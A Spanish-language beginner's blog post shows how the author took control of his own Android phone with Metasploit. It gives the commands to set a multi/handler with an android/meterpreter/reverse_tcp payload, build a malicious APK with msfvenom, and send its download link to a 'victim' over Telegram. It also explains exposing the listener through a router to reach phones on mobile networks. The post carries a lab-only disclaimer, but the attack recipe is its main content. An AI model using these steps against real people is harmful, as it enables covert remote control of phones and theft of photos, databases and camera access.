Hackeando Android en menos de 5 minutos

Desde hace ya algún tiempo, estoy más y más interesado en aprender lo máximo posible sobre seguridad informática y el hacking ético, me gusta este mundillo y estoy empezando a aprender cosas muy interesantes, todo ello gracias a Internet y a la lectura de muchos artículos, libros, noticias … etc, si algo me está quedando claro es que si no te gusta leer para aprender lo llevas claro. Si te piensas que con verte 3 o 4 tutoriales en Internet ya te puedes considerar un hacker lo llevas claro amigo mío…

Yo soy el primero, estoy empezando en esto y por lo tanto no me considero un hacker, ya que entiendo que estas personas tienen unos conocimientos muy grandes, en cuanto a seguridad y sistemas, es por esto que yo mismo consideraría una ofensa para esta comunidad el autodenominarme hacker, quizás algún día con trabajo y esfuerzo si pueda ser uno más, pero por ahora sigo aprendiendo poco a poco…

En estos días he estado trasteando con kali linux, más concretamente con metasploit, aprendiendo sobre exploits y payloads e investigando como funcionan. Como me aburro mucho últimamente, se me ocurrió enredar con la seguridad de mi smartphone e intentar hacerme con el control del mismo, lo cierto es que al principio me costaba un poco pillar el concepto de que es un exploit y un payload, pero bueno, ahora puedo decir que ya lo entiendo mejor, por eso me decidí a hacer un app la cual me iba a permitir realizar una conexión tcp inversa a mi máquina virtual con kali linux.

Mi sorpresa fué que lo conseguí en menos de 5 minutos y pude hacer lo que me diera la gana con el, literalmente, por eso decidí realizar un vídeo dónde se visualizara mi proceso. Aquí os lo dejo..

IMPORTANTE:

Lo que estáis a punto de ver esta realizado en un entorno de prueba, con máquinas virtuales y dispositivos móviles personales, todo el material informático que utilizaré será mío y por lo tanto no me hago responsable de que otras personas lleven este tipo de ataques a sistemas informáticos reales, siendo ilegal y teniendo penas de cárcel en este país. Repito y que quede claro, esto es una PRUEBA y por lo tanto lo hago para aportar conocimientos puramente académicos y aprender mientras las realizo, si alguien «juega» con sistemas reales será su responsabilidad y no la mía.

Hackeando el dichoso smartphone

Aquí tenéis el vídeo ya!!

Diferencias entre Exploit y Payload

Quien no sepa que son cada una de estas dos cosas aquí os lo dejaré bien explicado, lo primero una foto, ya sabéis eso que dicen que más vale una imagen que mil palabras…

hackeando

 

 

 

 

 

 

 

 

 

 

Lo primero, ¿que es una vulnerabilidad?

Una vulnerabilidad es una debilidad del sistema informático que puede ser utilizada para causar un daño.

¿Y entonces que es un exploit?

Un ‘exploit‘ es un programa o técnica que aprovecha una vulnerabilidad.

¿Y un payload?

Parte del malware que realiza la acción maliciosa. En el análisis de software malicioso como gusanos, virus o Troyanos, se refiere a los resultados del ataque del software. Ejemplos de payloads podrían ser destrucción de datos, mensajes ofensivos o correo electrónico basura enviado a una gran cantidad de personas (spam).

Exploit y payload que he usado

El exploit que he usado es uno muy genérico en este caso, para usarlo abrimos la consola de metasploit (msfconsole), previamente habiendo iniciado el servicio postgreesql, para que metasploit se pueda conectar a la base de datos. Antes era necesario iniciar el servicio metasploit y el postgreesql, actualmente sólo es necesario iniciar postgreesql, debido a que cuando iniciamos metasploit el servicio se lanza automáticamente.

Una vez abierta la consola de metasploit ejecutamos lo siguiente:

use exploit/multi/handler

Ahora tenemos que selecciona un payload, para ello:

set payload android/meterpreter/reverse_tcp

Ahora tenemos que configurar las opciones. para ver que opciones tenemos que configurar ejecutamos «show options». Una vez hemos visto las opciones ahora les tenemos que dotar de una valor, para ello y para cada opción, ejecutamos:

set NOMBREOPCION valor

En este caso tendremos 2 opciones, LHOST y LPORT, aquí tengo que poner la IP y el puerto a los que se conectará el dispositivo android, en este caso el propio kali. Lo que vamos a hacer es una conexión TCP inversa, por lo tanto no seremos nosotros los que estableceremos la conexión con el móvil sino que será al contrario, el móvil iniciará la conexión hacia el sistema kali y una vez hecho esto podremos empezar a jugar con el….

En mi caso, como es una prueba, la dirección IP será privada y por lo tanto se asume que tanto el atacante como la víctima estarán en la misma red de área LOCAL. Si quisiéramos probar con un dispositivo que está conectado mediante 3G o 4G, lo primero que abría que hacer sería abrir un puerto en el router y poner la IP pública de nuestro router en LHOST y en LPORT, el puerto que hemos abierto. Más adelante aré esto pero con equipos Windows y Linux.

Una vez configurado estas opciones ahora ejecutamos el exploit, para ello:

exploit
Creación del fichero apk malicioso.

Para ello tenemos que usar el comando msfvenom, tenemos que abrir un terminal diferente al actual y es MUY IMPORTANTE QUE NO CERRÉIS EL ACTUAL. Una vez hemos abierto el terminal, para este caso, ejecutamos lo siguiente:

msfvenom -p android/meterpreter/reverse_tcp LHOST=IPMaquinaKALI set LPORT=Puertoelegido R > aplicacion.apk

Una vez hemos creado el apk, lo siguiente es subirlo a un servidor web y posteriormente enviar el enlace de acceso al apk a la víctima, en este caso vía Telegram (recordemos que es una prueba). Una vez ejecute la víctima la aplicación, si nos vamos a la consola metasploit que tenemos abierta veremos como se ha establecido la conexión y podremos empezar a ejecutar todo tipo de comandos en el móvil de la víctima, desde toma de fotos, volvado de bases de datos, imágenes, poner el móvil en modo straming … etc. Todo esto lo podréis ver en el vídeo.

NOTA:

Para iniciar los ervicios:

service nombre servicio [start | stop | restart | status]

Dicho esto os iré trayendo más noticias conforme vaya aprendiendo más cosillas, ¡¡HASTA LA PRÓXIMA!!

Deja un comentario